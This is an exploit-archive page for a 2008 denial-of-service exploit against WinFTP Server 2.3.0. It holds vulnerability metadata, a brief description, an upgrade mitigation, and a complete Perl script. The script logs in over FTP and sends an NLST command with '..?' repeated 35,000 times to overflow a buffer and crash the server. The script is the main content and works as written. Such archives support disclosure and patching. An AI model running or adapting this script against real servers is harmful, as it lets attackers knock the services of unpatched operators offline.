header-logo
Suggest Exploit
vendor:
WinFTP Server
by:
Julien Bedard
7.5
CVSS
HIGH
Denial of Service (DoS)
119
CWE
Product Name: WinFTP Server
Affected Version From: 2.3.2000
Affected Version To: 2.3.2000
Patch Exists: Yes
Related CWE: N/A
CPE: //a:winftpserver:winftpserver:2.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Simple Dos Crap for the winftpsrv.exe v.2.3.0

This exploit uses a buffer overflow vulnerability in the WinFTP Server v.2.3.0 to cause a denial of service (DoS). The exploit sends a large number of '..?' characters to the server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of WinFTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
#  by Julien Bedard
#
####################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->nlst($overflow);
$ftp->quit;

# milw0rm.com [2008-09-26]

Navigation

Suggest Exploit

Services By CQR